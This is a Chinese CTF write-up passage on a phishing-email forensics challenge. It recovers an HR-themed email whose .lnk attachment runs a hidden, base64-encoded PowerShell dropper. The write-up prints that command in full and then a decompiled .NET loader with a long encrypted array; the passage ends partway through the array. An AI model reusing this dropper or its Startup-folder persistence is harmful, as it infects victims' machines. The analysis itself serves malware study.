16503 字
83 分钟
【Volcania】2025 湾区杯初赛 Writeup
2025-09-10
CTF
CTF
/
GBACC

Misc#

bademail | 未解出#

我收到了来自hr的邮件,当我打开附件的时候一个黑框一闪而过,我立刻上报了IT部门,于是他们拿走了我的硬盘。

给的是一个 RAID0 的文件,直接 R-Studio 读取就行,从 Thunderbird 的数据目录可以得到 INBOX 收件箱

这里面的最后一封邮件就是所谓的HR邮件

邮件内有

From: =?GBK?B?wfW378P5?= <hnhuimeng_hr@163.com>
Return-Path: hnhuimeng_hr@163.com

发件和回执地址相同,可以认为是真实发件邮箱

把附件拿出来,按照规定的密码解压,发现是一个 lnk 文件,实际执行的是

Terminal window
C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -enc "JJAB6AGQAPQAgAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuADsAJABjAGEAcABlAD0AIAAiACQAegBkAFwAVm5XU9h+pmgJZ1CWbFH4U6F7BnTEiZpbLgBsAG4AawAiADsAJABjADEAcwAyACAAPQAgAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAYwBhAHAAZQA7ACQAeABrACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAgAEAAKAAwAHgAMQAzACwAIAAwAHgARgA1ACkAOwAkAGYAYgBjAHMAZQAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABjAGEAcABlACkAOwAkAHMAdABzAGUAZQA9ACQAYwAxAHMAMgAuAEwAZQBuAGcAdABoAC0AMgA2ADEAOQA4ADgALQAzADUAMAAzADEAOwAkAGUAbgBjAHIAeQBwAHQAZQBkAEQAYQB0AGEAIAA9ACAAJABmAGIAYwBzAGUAMQBbACQAcwB0AHMAZQBlAC4ALgAoACQAZgBiAGMAcwBlADEALgBMAGUAbgBnAHQAaAAgAC0AMwA1ADAAMwAyACkAXQA7ACQAZAAwAHMAeABkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgACgAJABlAG4AYwByAHkAcAB0AGUAZABEAGEAdABhAC4ATABlAG4AZwB0AGgAKQA7AGYAbwByACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwByAHkAcAB0AGUAZABEAGEAdABhAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkADAAcwB4AGQAWwAkAGkAXQAgAD0AIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEQAYQB0AGEAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAeABrAFsAJABpACAAJQAgACQAeABrAC4ATABlAG4AZwB0AGgAXQB9ADsAJABvAG8AcAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAegBkACAAIAAtAEMAaABpAGwAZABQAGEAdABoACAAIgBWbldT2H6maAlnUJZsUfhToXsGdMSJmlsuAHAAZABmACIAOwBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABvAG8AcAAsACAAJABkADAAcwB4AGQAKQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAYwBhAHAAZQAgAC0ARgBvAHIAYwBlADsAaQBpACAAIgBWbldT2H6maAlnUJZsUfhToXsGdMSJmlsuAHAAZABmACIAOwAgACQAcABvADIAcwBkAHcAMQAgAD0AIAAkAGYAYgBjAHMAZQAxAFsAKAAkAGYAYgBjAHMAZQAxAC4ATABlAG4AZwB0AGgAIAAtACAAMwA1ADAAMwAxACkALgAuACgAJABmAGIAYwBzAGUAMQAuAEwAZQBuAGcAdABoACAALQAgADEAKQBdADsAIAAkAGMANAAwADUAdgBkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALAAkAHAAbwAyAHMAZAB3ADEAKQA7ACQAZABzADIAdwBkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnADYAUwBzAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwBaAGkAcABTAHQAcgBlAGEAbQAoACQAYwA0ADAANQB2AGQALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAGcANgBTAHMAYQAuAEMAbwBwAHkAVABvACgAJABkAHMAMgB3AGQAKQA7ACQAZABmADIAMwBkACAAPQAgACQAZABzADIAdwBkAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAdABhAHIAdAAgAE0AZQBuAHUAXABQAHIAbwBnAHIAYQBtAHMAXABTAHQAYQByAHQAdQBwAFwAdQBwAGQAYQB0AGUALgBlAHgAZQAiACwAIAAkAGQAZgAyADMAZAApAA=="

直接对 lnk 文件进行 binwalk 提取

得到了一个可执行文件

居然没法反编译?

才发现释放了一个 update.exe,我拿出来看看

因为他是放到了 shell:startup,所以可以认为权限维持手段是放到启动项中,得到 T1547.001

DnSpy 能开

using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;


// Token: 0x02000001 RID: 1
internal class <Module>
{
 // Token: 0x06000001 RID: 1 RVA: 0x00008A88 File Offset: 0x00006C88
 private static GCHandle Decrypt(uint[] A_0, uint A_1)
 {
  uint[] array = new uint[16];
  uint[] array2 = new uint[16];
  ulong num = (ulong)A_1;
  for (int i = 0; i < 16; i++)
  {
   num = num * num % 339722377UL;
   array2[i] = (uint)num;
   array[i] = (uint)(num * num % 1145919227UL);
  }
  array[0] = (array[0] * array2[0] ^ 3575996521U);
  array[1] = (array[1] * array2[1] ^ 3575996521U);
  array[2] = (array[2] + array2[2]) * 105751387U;
  array[3] = array[3] * array2[3] + 1392710451U;
  array[4] = (array[4] ^ array2[4]) + 1392710451U;
  array[5] = array[5] * array2[5] + 1392710451U;
  array[6] = (array[6] ^ array2[6] ^ 3575996521U);
  array[7] = (array[7] ^ array2[7]) + 1392710451U;
  array[8] = (array[8] ^ array2[8]) + 1392710451U;
  array[9] = (array[9] ^ array2[9]) * 105751387U;
  array[10] = (array[10] + array2[10]) * 105751387U;
  array[11] = (array[11] ^ array2[11]) + 1392710451U;
  array[12] = (array[12] ^ array2[12] ^ 3575996521U);
  array[13] = (array[13] + array2[13] ^ 3575996521U);
  array[14] = array[14] * array2[14] + 1392710451U;
  array[15] = array[15] + array2[15] + 1392710451U;
  Array.Clear(array2, 0, 16);
  byte[] array3 = new byte[A_0.Length << 2];
  uint num2 = 0U;
  for (int j = 0; j < A_0.Length; j++)
  {
   uint num3 = A_0[j] ^ array[j & 15];
   array[j & 15] = (array[j & 15] ^ num3) + 1037772825U;
   array3[(int)((UIntPtr)num2)] = (byte)num3;
   array3[(int)((UIntPtr)(num2 + 1U))] = (byte)(num3 >> 8);
   array3[(int)((UIntPtr)(num2 + 2U))] = (byte)(num3 >> 16);
   array3[(int)((UIntPtr)(num2 + 3U))] = (byte)(num3 >> 24);
   num2 += 4U;
  }
  Array.Clear(array, 0, 16);
  byte[] array4 = <Module>.Decompress(array3);
  Array.Clear(array3, 0, array3.Length);
  GCHandle result = GCHandle.Alloc(array4, GCHandleType.Pinned);
  ulong num4 = num % 9067703UL;
  for (int k = 0; k < array4.Length; k++)
  {
   byte[] array5 = array4;
   int num5 = k;
   array5[num5] ^= (byte)num;
   if ((k & 255) == 0)
   {
    num = num * num % 9067703UL;
   }
  }
  return result;
 }


 // Token: 0x06000002 RID: 2 RVA: 0x00008CE4 File Offset: 0x00006EE4
 [STAThread]
 private static int Main(string[] A_0)
 {
  uint[] array = new uint[]
  {
   1537738865U,
   1969713899U,
   4121852243U,
   1363007655U,
   4111316938U,
   1354601424U,
   1438092873U,
   1354540248U,
   2735911677U,
   1902455886U,
   4078724745U,
   520461837U,
   1818794620U,
   257151687U,
   1973759206U,
   2522003516U,
   2621073312U,
   2052851248U,
   700296147U,
   1003515706U,
   1333525621U,
   1514734063U,
   2173319522U,
   424792444U,
   2947179972U,
   1293258800U,
   3703394482U,
   924811239U,
   1209129814U,
   4285749643U,
   2893793886U,
   2636066642U,
   851455001U,
   1557375254U,
   1504330198U,
   440723795U,
   783000484U,
   3258579615U,
   3950440797U,
   4147844992U,
   3004977408U,
   2513854905U,
   1741895555U,
   457309823U,
   2663989355U,
   2172644867U,
   2415979810U,
   1107499389U,
   1300321912U,
   2970947374U,
   2039901191U,
   269063898U,
   361165153U,
   1267824670U,
   1517613281U,
   1982962928U,
   1348529444U,
   1311760932U,
   1670266918U,
   2843446061U,
   3720577995U,
   757627428U,
   2032447269U,
   3478746641U,
   543499722U,
   3496222120U,
   3826520958U,
   1104841279U,
   94025879U,
   317196849U,
   158692895U,
   2803847257U,
   333537168U,
   4243354845U,
   1896015587U,
   1926205481U,
   1939943201U,
   9219932U,
   4168927748U,
   801738412U,
   3628850579U,
   35694855U,
   3729552488U,
   3089421455U,
   1356449062U,
   4251230152U,
   2148889253U,
   482263044U,
   1511193317U,
   2758968831U,
   1816739601U,
   2717147101U,
   4040994365U,
   1144031584U,
   633715304U,
   3266390795U,
   1907049294U,
   823923606U,
   4081704455U,
   1083142132U,
   814898671U,
   3129624260U,
   1807860925U,
   1633379657U,
   475505861U,
   2202122732U,
   1609543999U,
   1230950279U,
   3513428425U,
   3977970554U,
   2716859708U,
   2637181158U,
   2277407989U,
   2180164332U,
   650569983U,
   675947776U,
   3634980589U,
   425269305U,
   3383324479U,
   3492679244U,
   3217104253U,
   20271279U,
   3591028349U,
   3077180021U,
   2226683726U,
   2724629579U,
   1586499589U,
   2813079189U,
   3353953861U,
   1475948071U,
   2034526662U,
   276948815U,
   2385983041U,
   2402358230U,
   3149933335U,
   1885438814U,
   983850256U,
   564181982U,
   1641982617U,
   1112750498U,
   2937523006U,
   1469088991U,
   627126841U,
   3996202256U,
   2259587460U,
   996806736U,
   2676647517U,
   2438677955U,
   1540948789U,
   3254980559U,
   1575834829U,
   2564836590U,
   1310854701U,
   385667404U,
   1651480338U,
   3418939410U,
   935000706U,
   4171355745U,
   3441987223U,
   405454644U,
   972481757U,
   3953831287U,
   1465885578U,
   3796294345U,
   2426861145U,
   2637066688U,
   2856251673U,
   1588409098U,
   77409825U,
   2478204622U,
   3812156764U,
   1064570303U,
   622223609U,
   1924888936U,
   3554542037U,
   893068089U,
   1483986021U,
   2593528521U,
   749203288U,
   1393894157U,
   1215297184U,
   3362179274U,
   2718476842U,
   3208327151U,
   94102635U,
   1277815706U,
   3444573396U,
   3503731219U,
   3326343731U,
   3648639734U,
   3703683942U,
   3374921006U,
   1043717242U,
   3650883060U,
   1392270619U,
   469758847U,
   2949305937U,
   1788192022U,
   278063185U,
   837323114U,
   3829346575U,
   1005599432U,
   1574186032U,
   2644837940U,
   4040593720U,
   3104759267U,
   1282461194U,
   1521319983U,
   2028227836U,
   2604602757U,
   713016361U,
   2551254913U,
   2457488405U,
   1724472847U,
   3914457692U,
   2719813673U,
   27192802U,
   1470567397U,
   3394165083U,
   1007923785U,
   3138988482U,
   2577742520U,
   58372657U,
   3620956474U,
   1913799228U,
   3394210737U,
   646305223U,
   359850450U,
   1034765942U,
   1837702724U,
   3009724247U,
   2174202813U,
   1992706173U,
   3731699372U,
   3862402829U,
   4096166841U,
   3986169057U,
   923546490U,
   438180424U,
   1544448909U,
   4023338538U,
   1023104917U,
   15021614U,
   2639082781U,
   4107914742U,
   4157658158U,
   2565578723U,
   4072617281U,
   3733074321U,
   108768119U,
   694515824U,
   3737802405U,
   2463943666U,
   2708516273U,
   1971213894U,
   2653712958U,
   338995387U,
   1643473621U,
   2357318157U,
   2474541014U,
   3857593041U,
   2249999007U,
   3147694507U,
   3863804524U,
   809773071U,
   903053992U,
   506378288U,
   1160542709U,
   1333725227U,
   690632168U,
   710569709U,
   3263854979U,
   1945470342U,
   1376601486U,
   714680310U,
   3010181686U,
   1690620473U,
   719122251U,
   1077760300U,
   3160533372U,
   1053520043U,
   2556792223U,
   481650493U,
   3808107470U,
   3472110396U,
   2038428182U,
   3179405624U,
   3296641743U,
   4236542496U,
   1449925600U,
   3706722240U,
   1453126340U,
   1586012380U,
   2341111504U,
   1564084467U,
   399106871U,
   3359130203U,
   687172874U,
   3810872337U,
   272831905U,
   223862487U,
   915626651U,
   1512179683U,
   3347807833U,
   3059583408U,
   3353840800U,
   4099853287U,
   3234205960U,
   2983718248U,
   366463252U,
   711509499U,
   3325334570U,
   1431018142U,
   4216120169U,
   2511593968U,
   3543684883U,
   3523064096U,
   106357350U,
   3810246630U,
   2335099899U,
   3424059021U,
   3898568265U,
   858015779U,
   3082705723U,
   761140972U,
   1124861865U,
   93396534U,
   2335507490U,
   242246325U,
   3177033269U,
   4123492040U,
   996988269U,
   3262888243U,
   2832472585U,
   645184668U,
   583719923U,
   3689867782U,
   1309116934U,
   2699977347U,
   2161670666U,
   2154333793U,
   2891035169U,
   366557302U,
   2155549952U,
   2260688556U,
   868124210U,
   651443282U,
   2204797118U,
   2096852990U,
   1347528846U,
   2983303797U,
   1733571206U,
   1788382482U,
   2011501623U,
   1140748785U,
   3567318016U,
   3181901443U,
   2263794374U,
   2494783289U,
   94134265U,
   3444198375U,
   2937817832U,
   3054022221U,
   2619624955U,
   2212348728U,
   696562584U,
   74960501U,
   1240475346U,
   1213448443U,
   990552405U,
   4057985421U,
   2269474968U,
   2136462033U,
   642682980U,
   2900892141U,
   3652636260U,
   172874525U,
   3817343196U,
   840758172U,
   749155114U,
   2696614550U,
   3894951071U,
   2618095853U,
   755884299U,
   2244452085U,
   3227881484U,
   3076805464U,
   120345728U,
   3398943682U,
   3484427667U,
   3123993150U,
   2880398283U,
   3712006148U,
   2755176670U,
   1029723198U,
   2461383727U,
   3360439458U,
   4101802551U,
   1033676457U,
   451906606U,
   3784387662U,
   943215268U,
   2003214157U,
   2339009917U,
   2317427899U,
   3510652702U,
   2947211111U,
   3934683126U,
   3945689594U,
   1633245552U,
   4037043161U,
   614873526U,
   2903408465U,
   2886965126U,
   2566297661U,
   1561791950U,
   924836668U,
   2686438740U,
   1846466565U,
   3972781041U,
   247225058U,
   3011773442U,
   2422828403U,
   1833782168U,
   1810548391U,
   2897745874U,
   2348654271U,
   3803855476U,
   3965689741U,
   42483303U,
   3916509912U,
   3329230433U,
   320480329U,
   2230977206U,
   54020580U,
   26547081U,
   990508761U,
   2255533511U,
   2923477945U,
   1612423326U,
   1467730186U,
   3639812397U,
   1305532969U,
   2413712403U,
   909775862U,
   770971936U,
   1523265470U,
   3770864661U,
   462183541U,
   2630471696U,
   3548820175U,
   410504562U,
   3181790402U,
   4048009995U,
   710338392U,
   1027210383U,
   1307317048U,
   3301379420U,
   3768246440U,
   1173041687U,
   3586680946U,
   3864793213U,
   690954821U,
   3087756446U,
   1563908040U,
   2658180302U,
   3847039299U,
   1447480038U,
   3907409559U,
   1560367713U,
   1775490471U,
   913133805U,
   2352251617U,
   1966118140U,
   3096993596U,
   1487896682U,
   1005872764U,
   39447873U,
   2290602421U,
   1236802176U,
   4136141284U,
   1057861065U,
   1471308741U,
   212952383U,
   439424870U,
   477916894U,
   1548615345U,
   2862876431U,
   1152066452U,
   366757409U,
   165510261U,
   3546307801U,
   3902370209U,
   1435190892U,
   2746551418U,
   3849203217U,
   3072304963U,
   3064767332U,
   1843702926U,
   1695140285U,
   1269785456U,
   3649168535U,
   1812218355U,
   2570870587U,
   2358292263U,
   3858007643U,
   1036981823U,
   2905295271U,
   2525143772U,
   3038091200U,
   3797954543U,
   2691796893U,
   3339666992U,
   3697818308U,
   3406660200U,
   3885216857U,
   1802080095U,
   3143045237U,
   2365124404U,
   549118654U,
   3800215302U,
   766309523U,
   4246029374U,
   3714070394U,
   340356937U,
   3065550617U,
   1951458742U,
   1680946871U,
   3029989483U,
   160610825U,
   318319205U,
   2670502011U,
   2129450302U,
   2585405248U,
   2722421286U,
   1736955645U,
   889637808U,
   1898448589U,
   3403855080U,
   2790382233U,
   2691154432U,
   889217503U,
   3110509417U,
   665510256U,
   3274301580U,
   659365528U,
   2453244477U,
   4260744806U,
   2793712943U,
   4000550281U,
   379304094U,
   1023523015U,
   2110283520U,
   3316795428U,
   655047560U,
   3363891042U,
   3777950768U,
   3589480904U,
   3267074546U,
   2775968129U,
   1230863997U,
   8816910U,
   1187287561U,
   114592439U,
   185231592U,
   1034185171U,
   2177427234U,
   2163405400U,
   3352210961U,
   3440656164U,
   1603888949U,
   3332537175U,
   1057994133U,
   2907382269U,
   191596803U,
   1163699326U,
   1362875937U,
   1980876722U,
   1601804005U,
   4263329180U,
   4086199312U,
   2527949225U,
   3091045620U,
   2316684176U,
   2725688298U,
   3555622019U,
   1585711015U,
   1174817859U,
   1856061144U,
   3807322645U,
   4255959907U,
   2436050315U,
   250725586U,
   554506098U,
   3672192816U,
   2523482569U,
   2406948101U,
   595917706U,
   2053050238U,
   1325376781U,
   1992137693U,
   1846518884U,
   3917363492U,
   3553014198U,
   2021541366U,
   1635073492U,
   1447420949U,
   1343235355U,
   1918983608U,
   1758881076U,
   2369113509U,
   266322130U,
   1279145845U,
   3302356149U,
   4075736792U,
   3291748493U,
   865180353U,
   1608800633U,
   1134345984U,
   3134084539U,
   152077712U,
   2480482497U,
   3195657393U,
   1936890388U,
   2889630740U,
   2301781664U,
   4024974541U,
   2210139125U,
   1256560725U,
   4262694196U,
   461633025U,
   2782999536U,
   2457859060U,
   2305342654U,
   520984398U,
   1862903689U,
   3665789066U,
   3895266865U,
   4035283577U,
   929553346U,
   1350365535U,
   769528333U,
   1764818912U,
   1903158539U,
   2294597210U,
   2244032118U,
   1284184930U,
   3171809662U,
   1123958636U,
   27789748U,
   3461904849U,
   1023215885U,
   2714206026U,
   2790519746U,
   4276391885U,
   305016589U,
   919374134U,
   207300234U,
   1843127467U,
   417982253U,
   1651949410U,
   58826243U,
   1040235162U,
   3515799110U,
   932334269U,
   1028955886U,
   754068383U,
   1760208296U,
   665721390U,
   3693880727U,
   3099490380U,
   4243968244U,
   3217182675U,
   1908516885U,
   167769454U,
   458543733U,
   2550947634U,
   2648047665U,
   489825386U,
   39030945U,
   3311557031U,
   1442464577U,
   1529694231U,
   2996676404U,
   4192521262U,
   3177241385U,
   3350747580U,
   518677859U,
   776512644U,
   2405433565U,
   902463333U,
   427604544U,
   3532856602U,
   1766175174U,
   4016048042U,
   3254911638U,
   3012190041U,
   244459849U,
   772350754U,
   362759481U,
   665515532U,
   1996326227U,
   2462044284U,
   3041192947U,
   877627309U,
   1051444030U,
   1592420754U,
   715661443U,
   584963202U,
   106859113U,
   1681992255U,
   2971001313U,
   3666554859U,
   3534533508U,
   60091763U,
   3261543047U,
   3411986189U,
   803246198U,
   1075484355U,
   317009561U,
   1781209526U,
   3331069287U,
   1511692155U,
   3439054160U,
   850883813U,
   1244119946U,
   3805286346U,
   3067483818U,
   3392087771U,
   926859335U,
   2083284185U,
   2038466396U,
   1904762510U,
   4055722327U,
   1830737324U,
   4138334173U,
   2564370097U,
   4156516122U,
   3991893441U,
   3309766791U,
   2230242922U,
   3921095603U,
   4052076882U,
   3589608420U,
   2356654057U,
   3504842700U,
   4003017484U,
   3789829344U,
   4227572734U,
   2400751784U,
   2775431092U,
   3700430993U,
   2673684342U,
   3070132583U,
   3206046057U,
   3825646163U,
   1014419865U,
   4264556761U,
   3676699182U,
   2891464423U,
   1341221118U,
   1619035422U,
   3860012104U,
   552911812U,
   819461901U,
   1650558500U,
   126050489U,
   1252673556U,
   1937122423U,
   2361261526U,
   1324981738U,
   3757140648U,
   2759814949U,
   810203452U,
   2878561854U,
   567347303U,
   2778332838U,
   1964231530U,
   652798281U,
   1936233487U,
   2029301771U,
   2449299214U,
   3806187990U,
   1516215703U,
   4268034439U,
   2552565163U,
   2532964320U,
   2440063618U,
   4010867806U,
   4052437232U,
   3435432497U,
   1254888490U,
   3347936633U,
   52294296U,
   895638305U,
   3037095114U,
   3949557144U,
   3709003188U,
   1048859081U,
   1499651995U,
   1678764744U,
   2952288351U,
   1668890063U,
   3346397025U,
   2123279482U,
   1903877336U,
   179830662U,
   2465760713U,
   1020565594U,
   2548461996U,
   1326850626U,
   2507455409U,
   3072613555U,
   2901019710U,
   3624634810U,
   2079771859U,
   2333005753U,
   477543475U,
   120441902U,
   1450311884U,
   3561862163U,
   143418098U,
   1355810765U,
   2489069069U,
   2525395024U,
   1008105544U,
   2124103818U,
   1021633261U,
   1059337550U,
   3059667460U,
   3930502268U,
   3906117534U,
   1667300326U,
   2179746028U,
   3962445527U,
   1747185557U,
   1074051983U,
   3319937714U,
   114595038U,
   2177859738U,
   545793793U,
   2506895998U,
   368713595U,
   810657050U,
   4120696122U,
   107397435U,
   3104024025U,
   1996596820U,
   2753176514U,
   1838354062U,
   2463031030U,
   1046371061U,
   3856583946U,
   1877527860U,
   2621196491U,
   3166099500U,
   45461463U,
   2812975891U,
   2990426066U,
   1456753704U,
   757857839U,
   2605999934U,
   1425122193U,
   97854097U,
   2745285510U,
   180553817U,
   2379208412U,
   853756626U,
   4196244110U,
   3918369792U,
   3340491386U,
   110376737U,
   2671978482U,
   917544869U,
   3016914018U,
   999185666U,
   3001634985U,
   1261027889U,
   132333947U,
   2125846375U,
   3072845459U,
   3144432178U,
   278107783U,
   3482027813U,
   3815371461U,
   3074532024U,
   3662598232U,
   105756364U,
   2159104621U,
   2042835846U,
   823567955U,
   3590363827U,
   4254112262U,
   2203170602U,
   3405380809U,
   1069163982U,
   348773675U,
   3414567217U,
   2760315975U,
   3832197038U,
   2247145333U,
   1819035718U,
   1248330137U,
   1153284666U,
   911301809U,
   2006887304U,
   124978802U,
   398307541U,
   1200397241U,
   2889043780U,
   3776852546U,
   2873152247U,
   2266757114U,
   1169283632U,
   4137046486U,
   646905054U,
   875591774U,
   3552529522U,
   762515344U,
   3895682842U,
   1941158573U,
   3130779898U,
   2564270378U,
   925165085U,
   1355328857U,
   108662748U,
   1990211990U,
   2983308874U,
   2543724974U,
   1602168400U,
   3333278510U,
   3701726313U,
   764270557U,
   3868047932U,
   1190942884U,
   805010375U,
   1546987697U,
   3858988730U,
   4027009288U,
   2247348983U,
   2405732813U,
   2809070581U,
   2644371657U,
   2640657695U,
   4243993906U,
   1698502745U,
   2516080279U,
   3788737047U,
   502293754U,
   1122687022U,
   1335471236U,
   1869224541U,
   1829350427U,
   3568751491U,
   2069366409U,
   2560863393U,
   2989363683U,
   2127452074U,
   2581095313U,
   679560341U,
   1029680431U,
   1929823549U,
   1453626627U,
   1482912718U,
   2547346181U,
   3485845832U,
   2956919282U,
   110950035U,
   2913577466U,
   3414206901U,
   3262698902U,
   572602304U,
   3122932538U,
   1135831940U,
   2328425604U,
   2334246703U,
   2235375634U,
   3934716352U,
   3678997827U,
   3193220927U,
   3025301035U,
   3143894224U,
   1452941058U,
   3394654481U,
   1512656172U,
   591996826U,
   1287138399U,
   1926898290U,
   1425122358U,
   3726530977U,
   1565432771U,
   136969970U,
   186307658U,
   3369332856U,
   1964734028U,
   675322549U,
   4112346384U,
   203382161U,
   2116855019U,
   1509801304U,
   2424786171U,
   3836822242U,
   2406239801U,
   559900206U,
   2433148543U,
   2589050087U,
   483880542U,
   4217778539U,
   189460761U,
   2547110372U,
   1386488357U,
   3967760932U,
   2169895220U,
   767311606U,
   2582629659U,
   3629040066U,
   1682040039U,
   1245674674U,
   3827347173U,
   1117943099U,
   3506701207U,
   312605982U,
   156491128U,
   2654380713U,
   2171329355U,
   211155109U,
   3031900165U,
   3953854906U,
   1344855403U,
   645087702U,
   4094686636U,
   3486260626U,
   1611435383U,
   711208135U,
   640065810U,
   2026087993U,
   2346576614U,
   3523831494U,
   3270305889U,
   1584437696U,
   3857843680U,
   3461870680U,
   1739645663U,
   121665449U,
   966206927U,
   2590106149U,
   1742498545U,
   418319937U,
   812302940U,
   3363167273U,
   2538091823U,
   1805073807U,
   543021637U,
   3028835668U,
   712027102U,
   3049998164U,
   2610014475U,
   263253978U,
   2268321514U,
   3852203261U,
   2826889961U,
   575899659U,
   309215347U,
   1353964707U,
   206995735U,
   871729626U,
   1080480898U,
   2396892153U,
   4235676834U,
   3440955580U,
   3482309759U,
   1686083629U,
   1421527038U,
   431944991U,
   3525078429U,
   3185534760U,
   2047822678U,
   1320102347U,
   3140791110U,
   4238617355U,
   2208602015U,
   1881244288U,
   33907059U,
   4250419172U,
   2422943447U,
   569360802U,
   1206459707U,
   2658407714U,
   2333880519U,
   1488163772U,
   211626693U,
   1204759464U,
   183140959U,
   764034580U,
   2411102772U,
   3388433669U,
   3434633963U,
   603712602U,
   4083120455U,
   2098022391U,
   4029491890U,
   3803558765U,
   93987677U,
   800370308U,
   415475965U,
   2909105618U,
   865098475U,
   49291069U,
   2882008128U,
   3855658678U,
   219887160U,
   2097125959U,
   3326901232U,
   1252665118U,
   1134083911U,
   342177442U,
   1895588595U,
   3961909593U,
   623230390U,
   3997856264U,
   2109304889U,
   3912214450U,
   3016281971U,
   1898797240U,
   1093131635U,
   956706285U,
   1629748531U,
   146726782U,
   110512368U,
   977663141U,
   3529625620U,
   1812404613U,
   2855927100U,
   151645126U,
   1125976182U,
   1417975685U,
   1401444874U,
   3317630582U,
   3232043005U,
   763545818U,
   1330253895U,
   1034532201U,
   3625814919U,
   1414574183U,
   839241716U,
   2128326532U,
   39938150U,
   424087667U,
   2662453830U,
   4029789188U,
   3972284474U,
   1367831114U,
   596502251U,
   2580814682U,
   2648676336U,
   2846012892U,
   777332277U,
   877114698U,
   4286295294U,
   3786291915U,
   4245547100U,
   3249953129U,
   3754754640U,
   3108713407U,
   3108915008U,
   887087978U,
   957317608U,
   1480366817U,
   3589519059U,
   3621491794U,
   1396600278U,
   1950811843U,
   2423554754U,
   2594518944U,
   597141514U,
   419791740U,
   1078337731U,
   1409548969U,
   1375354134U,
   4065070541U,
   2186630265U,
   1412094152U,
   3174171217U,
   2141808327U,
   3916097465U,
   1921927345U,
   3658652570U,
   2112786451U,
   2618359760U,
   3587193352U,
   774117371U,
   1989734017U,
   2867141677U,
   3875356660U,
   1017564079U,
   1548907405U,
   835787820U,
   1227837722U,
   3514969313U,
   2711747855U,
   1429924685U,
   90409576U,
   837928570U,
   3017777274U,
   3362777172U,
   2834722728U,
   1346285485U,
   3858757000U,
   3477312251U,
   2676692168U,
   1023013548U,
   1860989342U,
   2026730003U,
   3322504380U,
   1332506536U,
   788036362U,
   354590244U,
   21695531U,
   1741462550U,
   583190385U,
   327244032U,
   3723372067U,
   2565727599U,
   1157016624U,
   1888399430U,
   1645591969U,
   2231914704U,
   1322632441U,
   3175971405U,
   1579338283U,
   4117351177U,
   1179136086U,
   2002802108U,
   1096569394U,
   1608363183U,
   754514748U,
   4223094561U,
   2486779105U,
   2227485811U,
   2894054665U,
   478472726U,
   156190492U,
   321831818U,
   485486148U,
   3754815273U,
   2105642671U,
   1569341897U,
   4053706920U,
   3116048836U,
   239220322U,
   1435896448U,
   1883939515U,
   140354519U,
   3850600031U,
   1380466542U,
   1976761823U,
   2528912395U,
   2773448588U,
   782638137U,
   3553942445U,
   528133427U,
   4127042408U,
   3115931239U,
   1971440155U,
   2784378988U,
   29679172U,
   2286949097U,
   1719463498U,
   2414982214U,
   3771752783U,
   1625293610U,
   4021681436U,
   351914438U,
   1952230723U,
   172645565U,
   3468013497U,
   159205129U,
   250823232U,
   948562793U,
   3025742011U,
   2596275394U,
   2718788308U,
   3121139964U,
   1665557622U,
   2713506483U,
   1791801652U,
   3691385409U,
   1631108575U,
   1724766255U,
   3574591637U,
   3937280724U,
   1228610164U,
   363666311U,
   306071850U,
   2065099943U,
   3423586425U,
   246369205U,
   4118817440U,
   1548264189U,
   2505455361U,
   1667031387U,
   4264584455U,
   241645860U,
   1106207354U,
   3519076145U,
   1773865667U,
   314673742U,
   4169898460U,
   1223335496U,
   3008119679U,
   1877602339U,
   426708946U,
   2761856471U,
   2655604030U,
   3987173338U,
   2502301415U,
   1263816438U,
   1844254989U,
   4029080544U,
   3917459813U,
   1780633251U,
   3321742869U,
   2790851040U,
   153881044U,
   2967098092U,
   1283901428U,
   2905885803U,
   3353506679U,
   2351717128U,
   368849812U,
   2234504743U,
   3893373034U,
   1106220963U,
   2129224302U,
   1429546340U,
   699795716U,
   1493971281U,
   759469488U,
   3876948931U,
   4037766214U,
   3651385364U,
   4069902629U,
   991975397U,
   1081457898U,
   1877916329U,
   2010787940U,
   1132408870U,
   2482627358U,
   3721981379U,
   388408096U,
   1021249660U,
   1159866061U,
   1481528486U,
   3427306830U,
   401223092U,
   873569067U,
   2745908285U,
   4099564249U,
   2289371270U,
   4154420923U,
   4222095942U,
   2387479470U,
   2534690576U,
   1556451628U,
   1790861178U,
   942928688U,
   2038158283U,
   420008522U,
   1448397250U,
   1176892560U,
   768957607U,
   1276711062U,
   4130798377U,
   242831104U,
